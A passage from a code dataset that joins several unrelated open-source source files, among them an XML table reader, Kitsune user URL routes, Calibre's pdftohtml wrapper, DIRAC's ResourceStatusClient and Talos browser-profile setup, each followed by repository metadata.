Returns a list of contained items for the specified name. Used by
__qsh__ to allow navigation of the object graph.
"""
return self.items(name)
def docSig(self, name):
args, varargs, varkw, defaults = inspect.getargspec(self.command(name))
if args and args[0] == "self":
args = args[1:]
return name + inspect.formatargspec(args, varargs, varkw, defaults)
def docText(self, name):
return textwrap.dedent(self.command(name).__doc__ or "")
def doc(self, name):
spec = self.docSig(name)
htext = self.docText(name)
htext = "\n".join([i for i in htext.splitlines()])
return spec + htext
def cmd_doc(self, name):
"""
Returns the documentation for a specified command name. Used by
__qsh__ to provide online help.
"""
if name in self.commands():
return self.doc(name)
else:
raise CommandError("No such command: %s" % name)
| gpl-3.0 | -735,328,225,687,440,100 | 29.11194 | 79 | 0.581 | false | 4.108961 | false | false | false |
sillygod/my-travel-in-learning-python | databaseProject/DataBase.py | 1 | 2520 |
'''
FUNC: read an XML file (database) and transform it into a list of dictionaries
note: not case sensitive
I will make a rule about the database in xml form
ex.
____________________________
Student |name | ID | score | and ID is a key
|aa | 1 | 10 |
|bb | 2 | 20 |
in XML file, I will use something like the following.
<table name='Student'>
<data>
<name>aa</name>
<ID key='key'>1</ID>
<score>10</score>
</data>
<data>
<name>bb</name>
<ID key='key'>2</ID>
<score>20</score>
</data>
</table>
table data type: a dict contain a dict of list ex. dict[{}:[{}]]
'''
try:
import xml.etree.cElementTree as eTree
except ImportError:
import xml.etree.ElementTree as eTree
# The try/except above prefers the C implementation (cElementTree) for speed.
# Since Python 3.3, importing xml.etree.ElementTree automatically picks the fastest implementation available.
class DataBase:
def __init__(self, fileName):
self.Table = {}
self.Tree = eTree.parse(fileName)
self.createTable()
def createTable(self):
''' start to traverse '''
for elem in self.Tree.iter(tag='table'):
tableName=elem.attrib['name'].upper()
self.Table[tableName] = [] # make a table
for data in elem: # enter the each data of table
rowAttribute={} # make a new dict
for attribute in data:
rowAttribute[attribute.tag.upper()]=attribute.text.upper()
self.Table[tableName].append(rowAttribute)
def getTable(self):
''' return a table '''
return self.Table
def findAttribInWhichTable(self, attribName):
result=[]
for key in self.Table:
if attribName in self.Table[key][0]:
result.append(key)
return result
def isTable(self, tableName):
''' check the existence of tableName'''
return tableName in self.Table
def outputTable(self, table):
''' table is a list '''
outputString=''
# dynamically adjust the alignment?
Alignment = '{:^20}'
isFirstColumn = True
if table == []:
return 'NULL'
order = table[0].keys()
for columnName in order:
if isFirstColumn:
outputString += Alignment.format(columnName)
isFirstColumn = False
else:
outputString += Alignment.format(columnName)
outputString += '\n'
isFirstColumn =True
for data in table:
for attrib in order:
if isFirstColumn:
outputString += Alignment.format(data[attrib])
isFirstColumn = False
else:
outputString += Alignment.format(data[attrib])
isFirstColumn = True
outputString += '\n'
return outputString
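# Illustrative usage (added; 'school.xml' is a hypothetical file in the format
# described by the module docstring):
#
#     db = DataBase('school.xml')
#     db.isTable('STUDENT')              # True: table names are upper-cased
#     db.findAttribInWhichTable('ID')    # ['STUDENT']
#     print(db.outputTable(db.getTable()['STUDENT']))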
| gpl-2.0 | 2,119,482,450,881,611,800 | 23.950495 | 102 | 0.658333 | false | 3.214286 | false | false | false |
DarkDruiD/Machinery | Python/Machinery/example.py | 1 | 1470 |
import time
import random
from datapath import Datapath
from controller import Delta
from controller import State
from controller import FSMD
def locked_on_enter():
print "Entered locked state"
time.sleep(3)
def locked_on_leave():
pass
locked = State("locked")
locked.on_enter = locked_on_enter
locked.on_leave = locked_on_leave
def unlocked_on_enter():
print "Entered unlocked state"
time.sleep(3)
def unlocked_on_leave():
pass
unlocked = State("unlocked")
unlocked.on_enter = unlocked_on_enter
unlocked.on_leave = unlocked_on_leave
datapath = Datapath()
def read_coin_function():
return random.randint(0, 1)
datapath.add_variable("coin", read_coin_function)
def read_push_function():
return random.randint(0, 1)
datapath.add_variable("push", read_push_function)
state_table = Delta()
def when_pushed(dp):
if dp.get_variable("push"):
return True
return False
state_table.add_transition(
locked,
locked,
when_pushed,
None
)
def when_coined(dp):
if dp.get_variable("coin"):
return True
return False
state_table.add_transition(
locked,
unlocked,
when_coined,
None
)
state_table.add_transition(
unlocked,
unlocked,
when_coined,
None
)
state_table.add_transition(
unlocked,
locked,
when_pushed,
None
)
states = (
locked,
unlocked
)
fmsd = FSMD(states, datapath, state_table, locked)
fmsd.run()
| mit | -3,953,514,065,446,916,000 | 12.125 | 50 | 0.669388 | false | 3.230769 | false | false | false |
anushbmx/kitsune | kitsune/users/urls.py | 1 | 4192 |
from django.conf import settings
from django.conf.urls import include, url
from django.views.decorators.cache import never_cache
from mozilla_django_oidc.views import OIDCAuthenticationCallbackView
import kitsune.flagit.views
from kitsune.sumo.views import redirect_to
from kitsune.users import api, views
from kitsune.users.models import Profile
# API patterns. All start with /users/api.
api_patterns = [
url(r'^usernames', api.usernames, name='users.api.usernames'),
]
# These will all start with /user/<user_id>/
detail_patterns = [
url(r'^$', views.profile, name='users.profile'),
url(r'^/documents$', views.documents_contributed, name='users.documents'),
url(r'^/edit$', views.edit_profile, name='users.edit_profile'),
# TODO:
# url('^abuse', views.report_abuse, name='users.abuse'),
]
users_patterns = [
url(r'^/auth$', views.user_auth, name='users.auth'),
url(r'^/login$', views.login, name='users.login'),
url(r'^/logout$', views.logout, name='users.logout'),
url(r'^/close_account$', views.close_account, name='users.close_account'),
url(r'^/activate/(?P<activation_key>\w+)$', views.activate,
name='users.old_activate'),
url(r'^/activate/(?P<user_id>\d+)/(?P<activation_key>\w+)$',
views.activate, name='users.activate'),
url(r'^/edit$', views.edit_profile, name='users.edit_my_profile'),
url(r'^/settings$', views.edit_settings, name='users.edit_settings'),
url(r'^/watches$', views.edit_watch_list, name='users.edit_watch_list'),
url(r'^/avatar$', views.edit_avatar, name='users.edit_avatar'),
url(r'^/avatar/delete$', views.delete_avatar, name='users.delete_avatar'),
url(r'^/deactivate$', views.deactivate, name='users.deactivate'),
url(r'^/deactivate-spam$', views.deactivate, {'mark_spam': True},
name='users.deactivate-spam'),
url(r'^/deactivation_log$', views.deactivation_log,
name='users.deactivation_log'),
url(r'^/make_contributor$', views.make_contributor,
name='users.make_contributor'),
# Password reset
url(r'^/pwreset$', views.password_reset, name='users.pw_reset'),
url(r'^/pwresetsent$', views.password_reset_sent,
name='users.pw_reset_sent'),
url(r'^/pwreset/(?P<uidb36>[-\w]+)/(?P<token>[-\w]+)$',
views.password_reset_confirm, name="users.pw_reset_confirm"),
url(r'^/pwresetcomplete$', views.password_reset_complete,
name="users.pw_reset_complete"),
# Forgot username
url(r'^/forgot-username$', views.forgot_username,
name='users.forgot_username'),
# Change password
url(r'^/pwchange$', views.password_change, name='users.pw_change'),
url(r'^/pwchangecomplete$', views.password_change_complete,
name='users.pw_change_complete'),
url(r'^/resendconfirmation$', views.resend_confirmation,
name='users.resend_confirmation'),
# Change email
url(r'^change_email$', redirect_to, {'url': 'users.change_email'},
name='users.old_change_email'),
url(r'^confirm_email/(?P<activation_key>\w+)$',
redirect_to, {'url': 'users.confirm_email'},
name='users.old_confirm_email'),
url(r'^/change_email$', views.change_email, name='users.change_email'),
url(r'^/confirm_email/(?P<activation_key>\w+)$',
views.confirm_change_email, name='users.confirm_email'),
url(r'^/api/', include(api_patterns)),
]
urlpatterns = [
# URLs for a single user.
url(r'^user/(?P<username>[\w@\.\s+-]+)', include(detail_patterns)),
url(r'^user/(?P<object_id>\w+)/flag$', kitsune.flagit.views.flag,
{'model': Profile}, name='users.flag'),
url(r'^users', include(users_patterns)),
]
if settings.OIDC_ENABLE:
urlpatterns += [
url(r'^fxa/callback/$', never_cache(OIDCAuthenticationCallbackView.as_view()),
name='users.fxa_authentication_callback'),
url(r'^fxa/authenticate/$', never_cache(views.FXAAuthenticateView.as_view()),
name='users.fxa_authentication_init'),
url(r'^fxa/logout/$', never_cache(views.FXALogoutView.as_view()),
name='users.fxa_logout_url'),
url(r'^oidc/', include('mozilla_django_oidc.urls')),
]
| bsd-3-clause | 7,517,170,160,506,751,000 | 40.098039 | 86 | 0.649332 | false | 3.303388 | false | false | false |
jelly/calibre | src/calibre/ebooks/pdf/pdftohtml.py | 1 | 6990 |
# -*- coding: utf-8 -*-
__license__ = 'GPL 3'
__copyright__ = '2008, Kovid Goyal <kovid at kovidgoyal.net>, ' \
'2009, John Schember <john@nachtimwald.com>'
__docformat__ = 'restructuredtext en'
import errno, os, sys, subprocess, shutil, re
from functools import partial
from calibre.ebooks import ConversionError, DRMError
from calibre.ebooks.chardet import xml_to_unicode
from calibre.ptempfile import PersistentTemporaryFile
from calibre.constants import (isosx, iswindows, islinux, isbsd,
filesystem_encoding)
from calibre import CurrentDir
from calibre.utils.cleantext import clean_xml_chars
PDFTOHTML = 'pdftohtml'
popen = subprocess.Popen
if isosx and hasattr(sys, 'frameworks_dir'):
PDFTOHTML = os.path.join(getattr(sys, 'frameworks_dir'), PDFTOHTML)
if iswindows and hasattr(sys, 'frozen'):
base = sys.extensions_location if hasattr(sys, 'new_app_layout') else os.path.dirname(sys.executable)
PDFTOHTML = os.path.join(base, 'pdftohtml.exe')
popen = partial(subprocess.Popen, creationflags=0x08) # CREATE_NO_WINDOW=0x08 so that no ugly console is popped up
if (islinux or isbsd) and getattr(sys, 'frozen', False):
PDFTOHTML = os.path.join(sys.executables_location, 'bin', 'pdftohtml')
def pdftohtml(output_dir, pdf_path, no_images, as_xml=False):
'''
Convert the pdf into html using the pdftohtml app.
This will write the html as index.html into output_dir.
It will also write all extracted images to the output_dir
'''
pdfsrc = os.path.join(output_dir, u'src.pdf')
index = os.path.join(output_dir, u'index.'+('xml' if as_xml else 'html'))
with open(pdf_path, 'rb') as src, open(pdfsrc, 'wb') as dest:
shutil.copyfileobj(src, dest)
with CurrentDir(output_dir):
# This is necessary as pdftohtml doesn't always (linux) respect
# absolute paths. Also, it allows us to safely pass only bytestring
# arguments to subprocess on windows
# subprocess in python 2 cannot handle unicode arguments on windows
# that cannot be encoded with mbcs. Ensure all args are
# bytestrings.
def a(x):
return os.path.basename(x).encode('ascii')
exe = PDFTOHTML.encode(filesystem_encoding) if isinstance(PDFTOHTML,
unicode) else PDFTOHTML
cmd = [exe, b'-enc', b'UTF-8', b'-noframes', b'-p', b'-nomerge',
b'-nodrm', a(pdfsrc), a(index)]
if isbsd:
cmd.remove(b'-nodrm')
if no_images:
cmd.append(b'-i')
if as_xml:
cmd.append('-xml')
logf = PersistentTemporaryFile(u'pdftohtml_log')
try:
p = popen(cmd, stderr=logf._fd, stdout=logf._fd,
stdin=subprocess.PIPE)
except OSError as err:
if err.errno == errno.ENOENT:
raise ConversionError(
_('Could not find pdftohtml, check it is in your PATH'))
else:
raise
while True:
try:
ret = p.wait()
break
except OSError as e:
if e.errno == errno.EINTR:
continue
else:
raise
logf.flush()
logf.close()
out = open(logf.name, 'rb').read().strip()
if ret != 0:
raise ConversionError(b'pdftohtml failed with return code: %d\n%s' % (ret, out))
if out:
print "pdftohtml log:"
print out
if not os.path.exists(index) or os.stat(index).st_size < 100:
raise DRMError()
if not as_xml:
with lopen(index, 'r+b') as i:
raw = i.read()
raw = flip_images(raw)
raw = '<!-- created by calibre\'s pdftohtml -->\n' + raw
i.seek(0)
i.truncate()
# versions of pdftohtml >= 0.20 output self closing <br> tags, this
# breaks the pdf heuristics regexps, so replace them
raw = raw.replace(b'<br/>', b'<br>')
raw = re.sub(br'<a\s+name=(\d+)', br'<a id="\1"', raw, flags=re.I)
raw = re.sub(br'<a id="(\d+)"', br'<a id="p\1"', raw, flags=re.I)
raw = re.sub(br'<a href="index.html#(\d+)"', br'<a href="#p\1"', raw, flags=re.I)
i.write(raw)
cmd = [exe, b'-f', b'1', '-l', '1', b'-xml', b'-i', b'-enc', b'UTF-8', b'-noframes', b'-p', b'-nomerge',
b'-nodrm', b'-q', b'-stdout', a(pdfsrc)]
p = popen(cmd, stdout=subprocess.PIPE)
raw = p.stdout.read().strip()
if p.wait() == 0 and raw:
parse_outline(raw, output_dir)
if isbsd:
cmd.remove(b'-nodrm')
try:
os.remove(pdfsrc)
except:
pass
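# Illustrative call (added; paths are hypothetical):
#     pdftohtml('/tmp/out', '/path/to/book.pdf', no_images=False)
# copies the PDF into /tmp/out as src.pdf, runs the pdftohtml binary there and
# leaves the converted index.html (plus any extracted images) in that
# directory.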
def parse_outline(raw, output_dir):
from lxml import etree
from calibre.ebooks.oeb.parse_utils import RECOVER_PARSER
raw = clean_xml_chars(xml_to_unicode(raw, strip_encoding_pats=True, assume_utf8=True)[0])
outline = etree.fromstring(raw, parser=RECOVER_PARSER).xpath('(//outline)[1]')
if outline:
from calibre.ebooks.oeb.polish.toc import TOC, create_ncx
outline = outline[0]
toc = TOC()
count = [0]
def process_node(node, toc):
for child in node.iterdescendants('*'):
if child.tag == 'outline':
parent = toc.children[-1] if toc.children else toc
process_node(child, parent)
else:
page = child.get('page', '1')
toc.add(child.text, 'index.html', 'p' + page)
count[0] += 1
process_node(outline, toc)
if count[0] > 2:
root = create_ncx(toc, (lambda x:x), 'pdftohtml', 'en', 'pdftohtml')
with open(os.path.join(output_dir, 'toc.ncx'), 'wb') as f:
f.write(etree.tostring(root, pretty_print=True, with_tail=False, encoding='utf-8', xml_declaration=True))
def flip_image(img, flip):
from calibre.utils.img import flip_image, image_and_format_from_data, image_to_data
with lopen(img, 'r+b') as f:
img, fmt = image_and_format_from_data(f.read())
img = flip_image(img, horizontal=b'x' in flip, vertical=b'y' in flip)
f.seek(0), f.truncate()
f.write(image_to_data(img, fmt=fmt))
def flip_images(raw):
for match in re.finditer(b'<IMG[^>]+/?>', raw, flags=re.I):
img = match.group()
m = re.search(br'class="(x|y|xy)flip"', img)
if m is None:
continue
flip = m.group(1)
src = re.search(br'src="([^"]+)"', img)
if src is None:
continue
img = src.group(1)
if not os.path.exists(img):
continue
flip_image(img, flip)
raw = re.sub(br'<STYLE.+?</STYLE>\s*', b'', raw, flags=re.I|re.DOTALL)
return raw
| gpl-3.0 | 4,022,858,997,273,561,000 | 37.406593 | 121 | 0.558798 | false | 3.484546 | false | false | false |
chaen/DIRAC | ResourceStatusSystem/Client/ResourceStatusClient.py | 1 | 14924 |
''' ResourceStatusClient
Client to interact with the ResourceStatusDB.
'''
# pylint: disable=unused-argument
__RCSID__ = '$Id$'
from DIRAC import S_OK
from DIRAC.Core.Base.Client import Client
from DIRAC.ConfigurationSystem.Client.Helpers.Operations import Operations
from DIRAC.FrameworkSystem.Client.NotificationClient import NotificationClient
from DIRAC.ResourceStatusSystem.Client.ResourceManagementClient import uppercase_first_letter
class ResourceStatusClient(Client):
"""
The :class:`ResourceStatusClient` class exposes the :mod:`DIRAC.ResourceStatus`
API. All functions you need are on this client.
You can use this client on this way
>>> from DIRAC.ResourceStatusSystem.Client.ResourceStatusClient import ResourceStatusClient
>>> rsClient = ResourceStatusClient()
"""
def __init__(self, **kwargs):
super(ResourceStatusClient, self).__init__(**kwargs)
self.setServer('ResourceStatus/ResourceStatus')
def _prepare(self, sendDict):
# remove unnecessary key generated by locals()
del sendDict['self']
del sendDict['element']
del sendDict['tableType']
# make each key name uppercase to match database column names (case sensitive)
for key, value in sendDict.items():
del sendDict[key]
if value:
sendDict.update({uppercase_first_letter(key): value})
return sendDict
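# Added illustration (not original code): _prepare(locals()) strips the
# bookkeeping keys and drops falsy values, so a call made with
# name='LCG.CERN.ch' and statusType=None would forward roughly
# {'Name': 'LCG.CERN.ch'}, assuming uppercase_first_letter capitalises the
# first character of each key.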
def insert(self, tableName, record):
"""
Insert a dictionary `record` as a row in table `tableName`
:param str tableName: the name of the table
:param dict record: dictionary of record to insert in the table
:return: S_OK() || S_ERROR()
"""
return self._getRPC().insert(tableName, record)
def select(self, tableName, params=None):
"""
Select rows from the table `tableName`
:param str tableName: the name of the table
:param dict record: dictionary of the selection parameters
:return: S_OK() || S_ERROR()
"""
if params is None:
params = {}
return self._getRPC().select(tableName, params)
def delete(self, tableName, params=None):
"""
Delete rows from the table `tableName`
:param str tableName: the name of the table
:param dict record: dictionary of the deletion parameters
:Returns:
S_OK() || S_ERROR()
"""
if params is None:
params = {}
return self._getRPC().delete(tableName, params)
################################################################################
# Element status methods - enjoy !
def insertStatusElement(self, element, tableType, name, statusType, status,
elementType, reason, dateEffective, lastCheckTime,
tokenOwner, tokenExpiration=None):
'''
Inserts on <element><tableType> a new row with the arguments given.
:Parameters:
**element** - `string`
it has to be a valid element ( ValidElement ), any of the defaults: `Site` \
| `Resource` | `Node`
**tableType** - `string`
it has to be a valid tableType [ 'Status', 'Log', 'History' ]
**name** - `string`
name of the individual of class element
**statusType** - `string`
it has to be a valid status type for the element class
**status** - `string`
it has to be a valid status, any of the defaults: `Active` | `Degraded` | \
`Probing` | `Banned`
**elementType** - `string`
column to distinguish between the different elements in the same element
table.
**reason** - `string`
decision that triggered the assigned status
**dateEffective** - `datetime`
time-stamp from which the status & status type are effective
**lastCheckTime** - `datetime`
time-stamp setting last time the status & status were checked
**tokenOwner** - `string`
token assigned to the site & status type
**tokenExpiration** - `datetime`
time-stamp setting validity of token ownership
:return: S_OK() || S_ERROR()
'''
return self._getRPC().insert(element + tableType, self._prepare(locals()))
def selectStatusElement(self, element, tableType, name=None, statusType=None,
status=None, elementType=None, reason=None,
dateEffective=None, lastCheckTime=None,
tokenOwner=None, tokenExpiration=None, meta=None):
'''
Gets from <element><tableType> all rows that match the parameters given.
:Parameters:
**element** - `string`
it has to be a valid element ( ValidElement ), any of the defaults: `Site` \
| `Resource` | `Node`
**tableType** - `string`
it has to be a valid tableType [ 'Status', 'Log', 'History' ]
**name** - `[, string, list]`
name of the individual of class element
**statusType** - `[, string, list]`
it has to be a valid status type for the element class
**status** - `[, string, list]`
it has to be a valid status, any of the defaults: `Active` | `Degraded` | \
`Probing` | `Banned`
**elementType** - `[, string, list]`
column to distinguish between the different elements in the same element
table.
**reason** - `[, string, list]`
decision that triggered the assigned status
**dateEffective** - `[, datetime, list]`
time-stamp from which the status & status type are effective
**lastCheckTime** - `[, datetime, list]`
time-stamp setting last time the status & status were checked
**tokenOwner** - `[, string, list]`
token assigned to the site & status type
**tokenExpiration** - `[, datetime, list]`
time-stamp setting validity of token ownership
**meta** - `dict`
metadata for the mysql query. Currently it is being used only for column selection.
For example: meta = { 'columns' : [ 'Name' ] } will return only the 'Name' column.
:return: S_OK() || S_ERROR()
'''
return self._getRPC().select(element + tableType, self._prepare(locals()))
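# Illustrative call (added for clarity; the argument values are examples):
#     rsClient.selectStatusElement('Site', 'Status', status='Active',
#                                  meta={'columns': ['Name', 'Status']})
# returns S_OK() with the matching rows, restricted to the requested columns
# as described for the `meta` parameter above.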
def deleteStatusElement(self, element, tableType, name=None, statusType=None,
status=None, elementType=None, reason=None,
dateEffective=None, lastCheckTime=None,
tokenOwner=None, tokenExpiration=None, meta=None):
'''
Deletes from <element><tableType> all rows that match the parameters given.
:Parameters:
**element** - `string`
it has to be a valid element ( ValidElement ), any of the defaults: `Site` \
| `Resource` | `Node`
**tableType** - `string`
it has to be a valid tableType [ 'Status', 'Log', 'History' ]
**name** - `[, string, list]`
name of the individual of class element
**statusType** - `[, string, list]`
it has to be a valid status type for the element class
**status** - `[, string, list]`
it has to be a valid status, any of the defaults: `Active` | `Degraded` | \
`Probing` | `Banned`
**elementType** - `[, string, list]`
column to distinguish between the different elements in the same element
table.
**reason** - `[, string, list]`
decision that triggered the assigned status
**dateEffective** - `[, datetime, list]`
time-stamp from which the status & status type are effective
**lastCheckTime** - `[, datetime, list]`
time-stamp setting last time the status & status were checked
**tokenOwner** - `[, string, list]`
token assigned to the site & status type
**tokenExpiration** - `[, datetime, list]`
time-stamp setting validity of token ownership
**meta** - `dict`
metadata for the mysql query
:return: S_OK() || S_ERROR()
'''
return self._getRPC().delete(element + tableType, self._prepare(locals()))
def addOrModifyStatusElement(self, element, tableType, name=None,
statusType=None, status=None,
elementType=None, reason=None,
dateEffective=None, lastCheckTime=None,
tokenOwner=None, tokenExpiration=None):
'''
Adds or updates-if-duplicated from <element><tableType> and also adds a log
if flag is active.
:Parameters:
**element** - `string`
it has to be a valid element ( ValidElement ), any of the defaults: `Site` \
| `Resource` | `Node`
**tableType** - `string`
it has to be a valid tableType [ 'Status', 'Log', 'History' ]
**name** - `string`
name of the individual of class element
**statusType** - `string`
it has to be a valid status type for the element class
**status** - `string`
it has to be a valid status, any of the defaults: `Active` | `Degraded` | \
`Probing` | `Banned`
**elementType** - `string`
column to distinguish between the different elements in the same element
table.
**reason** - `string`
decision that triggered the assigned status
**dateEffective** - `datetime`
time-stamp from which the status & status type are effective
**lastCheckTime** - `datetime`
time-stamp setting last time the status & status were checked
**tokenOwner** - `string`
token assigned to the site & status type
**tokenExpiration** - `datetime`
time-stamp setting validity of token ownership
:return: S_OK() || S_ERROR()
'''
return self._getRPC().addOrModify(element + tableType, self._prepare(locals()))
def modifyStatusElement(self, element, tableType, name=None, statusType=None,
status=None, elementType=None, reason=None,
dateEffective=None, lastCheckTime=None, tokenOwner=None,
tokenExpiration=None):
'''
Updates from <element><tableType> and also adds a log if flag is active.
:Parameters:
**element** - `string`
it has to be a valid element ( ValidElement ), any of the defaults: `Site` \
| `Resource` | `Node`
**tableType** - `string`
it has to be a valid tableType [ 'Status', 'Log', 'History' ]
**name** - `string`
name of the individual of class element
**statusType** - `string`
it has to be a valid status type for the element class
**status** - `string`
it has to be a valid status, any of the defaults: `Active` | `Degraded` | \
`Probing` | `Banned`
**elementType** - `string`
column to distinguish between the different elements in the same element
table.
**reason** - `string`
decision that triggered the assigned status
**dateEffective** - `datetime`
time-stamp from which the status & status type are effective
**lastCheckTime** - `datetime`
time-stamp setting last time the status & status were checked
**tokenOwner** - `string`
token assigned to the site & status type
**tokenExpiration** - `datetime`
time-stamp setting validity of token ownership
:return: S_OK() || S_ERROR()
'''
return self._getRPC().addOrModify(element + tableType, self._prepare(locals()))
def addIfNotThereStatusElement(self, element, tableType, name=None,
statusType=None, status=None,
elementType=None, reason=None,
dateEffective=None, lastCheckTime=None,
tokenOwner=None, tokenExpiration=None):
'''
Adds if-not-duplicated from <element><tableType> and also adds a log if flag
is active.
:Parameters:
**element** - `string`
it has to be a valid element ( ValidElement ), any of the defaults: `Site` \
| `Resource` | `Node`
**tableType** - `string`
it has to be a valid tableType [ 'Status', 'Log', 'History' ]
**name** - `string`
name of the individual of class element
**statusType** - `string`
it has to be a valid status type for the element class
**status** - `string`
it has to be a valid status, any of the defaults: `Active` | `Degraded` | \
`Probing` | `Banned`
**elementType** - `string`
column to distinguish between the different elements in the same element
table.
**reason** - `string`
decision that triggered the assigned status
**dateEffective** - `datetime`
time-stamp from which the status & status type are effective
**lastCheckTime** - `datetime`
        time-stamp setting last time the status & status type were checked
**tokenOwner** - `string`
token assigned to the site & status type
**tokenExpiration** - `datetime`
time-stamp setting validity of token ownership
:return: S_OK() || S_ERROR()
'''
return self._getRPC().addIfNotThere(element + tableType, self._prepare(locals()))
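  # Illustrative usage sketch (not part of the original client). Assuming this client
  # is instantiated as `rsClient` and using only the defaults documented above
  # ('Resource' element, 'Status' table, 'Banned' status), banning a node and later
  # clearing its log entries could look like:
  #
  #   res = rsClient.addOrModifyStatusElement('Resource', 'Status',
  #                                           name='ce01.example.org',
  #                                           statusType='all', status='Banned',
  #                                           reason='failing functional tests')
  #   if not res['OK']:
  #     print res['Message']
  #   rsClient.deleteStatusElement('Resource', 'Log', name='ce01.example.org')
  #
  # `ce01.example.org`, `statusType='all'` and the reason text are placeholders.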
##############################################################################
# Protected methods - Use carefully !!
def notify(self, request, params):
''' Send notification for a given request with its params to the diracAdmin
'''
address = Operations().getValue('ResourceStatus/Notification/DebugGroup/Users')
msg = 'Matching parameters: ' + str(params)
sbj = '[NOTIFICATION] DIRAC ResourceStatusDB: ' + request + ' entry'
NotificationClient().sendMail(address, sbj, msg, address)
def _extermineStatusElement(self, element, name, keepLogs=True):
'''
    Deletes from <element>Status,
    <element>History and
    <element>Log
    all rows with `elementName`. It removes all the entries, logs, etc.
    Use with common sense!
:Parameters:
**element** - `string`
it has to be a valid element ( ValidElements ), any of the defaults: \
`Site` | `Resource` | `Node`
**name** - `[, string, list]`
name of the individual of class element
**keepLogs** - `bool`
if active, logs are kept in the database
:return: S_OK() || S_ERROR()
'''
return self.__extermineStatusElement(element, name, keepLogs)
def __extermineStatusElement(self, element, name, keepLogs):
'''
    This method iterates over the two ( or three ) table types - depending
    on the value of keepLogs - deleting all matches of `name`.
'''
tableTypes = ['Status', 'History']
if keepLogs is False:
tableTypes.append('Log')
for table in tableTypes:
deleteQuery = self.deleteStatusElement(element, table, name=name)
if not deleteQuery['OK']:
return deleteQuery
return S_OK()
################################################################################
# EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF
|
gpl-3.0
| -4,775,719,922,118,156,000
| 38.170604
| 94
| 0.607679
| false
| 4.267658
| false
| false
| false
|
cstipkovic/spidermonkey-research
|
testing/talos/talos/ffsetup.py
|
1
|
6208
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""
Set up a browser environment before running a test.
"""
import os
import re
import tempfile
import mozfile
from mozprocess import ProcessHandler
from mozprofile.profile import Profile
from mozlog import get_proxy_logger
from talos import utils
from talos.utils import TalosError
from talos.sps_profile import SpsProfile
LOG = get_proxy_logger()
class FFSetup(object):
"""
Initialize the browser environment before running a test.
This prepares:
- the environment vars for running the test in the browser,
available via the instance member *env*.
- the profile used to run the test, available via the
instance member *profile_dir*.
- sps profiling, available via the instance member *sps_profile*
of type :class:`SpsProfile` or None if not used.
Note that the browser will be run once with the profile, to ensure
this is basically working and negate any performance noise with the
real test run (installing the profile the first time takes time).
This class should be used as a context manager::
with FFSetup(browser_config, test_config) as setup:
# setup.env is initialized, and setup.profile_dir created
pass
# here the profile is removed
"""
PROFILE_REGEX = re.compile('__metrics(.*)__metrics',
re.DOTALL | re.MULTILINE)
def __init__(self, browser_config, test_config):
self.browser_config, self.test_config = browser_config, test_config
self._tmp_dir = tempfile.mkdtemp()
self.env = None
# The profile dir must be named 'profile' because of xperf analysis
# (in etlparser.py). TODO fix that ?
self.profile_dir = os.path.join(self._tmp_dir, 'profile')
self.sps_profile = None
def _init_env(self):
self.env = dict(os.environ)
for k, v in self.browser_config['env'].iteritems():
self.env[k] = str(v)
self.env['MOZ_CRASHREPORTER_NO_REPORT'] = '1'
# for winxp e10s logging:
# https://bugzilla.mozilla.org/show_bug.cgi?id=1037445
self.env['MOZ_WIN_INHERIT_STD_HANDLES_PRE_VISTA'] = '1'
if self.browser_config['symbols_path']:
self.env['MOZ_CRASHREPORTER'] = '1'
else:
self.env['MOZ_CRASHREPORTER_DISABLE'] = '1'
self.env['MOZ_DISABLE_NONLOCAL_CONNECTIONS'] = '1'
self.env["LD_LIBRARY_PATH"] = \
os.path.dirname(self.browser_config['browser_path'])
def _init_profile(self):
preferences = dict(self.browser_config['preferences'])
if self.test_config.get('preferences'):
test_prefs = dict(
[(i, utils.parse_pref(j))
for i, j in self.test_config['preferences'].items()]
)
preferences.update(test_prefs)
# interpolate webserver value in prefs
webserver = self.browser_config['webserver']
if '://' not in webserver:
webserver = 'http://' + webserver
for name, value in preferences.items():
if type(value) is str:
value = utils.interpolate(value, webserver=webserver)
preferences[name] = value
extensions = self.browser_config['extensions'][:]
if self.test_config.get('extensions'):
extensions.append(self.test_config['extensions'])
if self.browser_config['develop'] or \
self.browser_config['branch_name'] == 'Try':
extensions = [os.path.dirname(i) for i in extensions]
profile = Profile.clone(
os.path.normpath(self.test_config['profile_path']),
self.profile_dir,
restore=False)
profile.set_preferences(preferences)
profile.addon_manager.install_addons(extensions)
def _run_profile(self):
command_args = utils.GenerateBrowserCommandLine(
self.browser_config["browser_path"],
self.browser_config["extra_args"],
self.profile_dir,
self.browser_config["init_url"]
)
def browser_log(line):
LOG.process_output(browser.pid, line)
browser = ProcessHandler(command_args, env=self.env,
processOutputLine=browser_log)
browser.run()
LOG.process_start(browser.pid, ' '.join(command_args))
try:
exit_code = browser.wait()
except KeyboardInterrupt:
browser.kill()
raise
LOG.process_exit(browser.pid, exit_code)
results_raw = '\n'.join(browser.output)
if not self.PROFILE_REGEX.search(results_raw):
LOG.info("Could not find %s in browser output"
% self.PROFILE_REGEX.pattern)
LOG.info("Raw results:%s" % results_raw)
raise TalosError("browser failed to close after being initialized")
def _init_sps_profile(self):
upload_dir = os.getenv('MOZ_UPLOAD_DIR')
if self.test_config.get('sps_profile') and not upload_dir:
LOG.critical("Profiling ignored because MOZ_UPLOAD_DIR was not"
" set")
if upload_dir and self.test_config.get('sps_profile'):
self.sps_profile = SpsProfile(upload_dir,
self.browser_config,
self.test_config)
self.sps_profile.update_env(self.env)
def clean(self):
mozfile.remove(self._tmp_dir)
if self.sps_profile:
self.sps_profile.clean()
def __enter__(self):
LOG.info('Initialising browser for %s test...'
% self.test_config['name'])
self._init_env()
self._init_profile()
try:
self._run_profile()
except:
self.clean()
raise
self._init_sps_profile()
LOG.info('Browser initialized.')
return self
def __exit__(self, type, value, tb):
self.clean()
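# Illustrative usage sketch (not part of the original module). The two config dicts
# are hypothetical and only contain keys this file actually reads; `run_test` is a
# placeholder for whatever consumes the prepared environment and profile.
#
#     browser_config = {
#         'env': {}, 'symbols_path': None, 'preferences': {}, 'extensions': [],
#         'develop': True, 'branch_name': '', 'webserver': 'localhost:8080',
#         'browser_path': '/path/to/firefox', 'extra_args': '',
#         'init_url': 'about:blank',
#     }
#     test_config = {'name': 'example', 'profile_path': '/path/to/base_profile',
#                    'preferences': {}, 'extensions': [], 'sps_profile': False}
#
#     with FFSetup(browser_config, test_config) as setup:
#         run_test(setup.env, setup.profile_dir)
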